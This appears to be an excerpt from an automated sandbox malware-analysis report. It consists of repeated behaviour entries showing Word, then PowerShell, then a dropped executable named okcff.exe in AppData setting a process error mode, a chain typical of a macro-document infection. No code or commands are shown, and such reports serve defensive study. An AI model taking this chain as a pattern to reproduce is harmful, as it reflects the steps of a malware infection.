Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
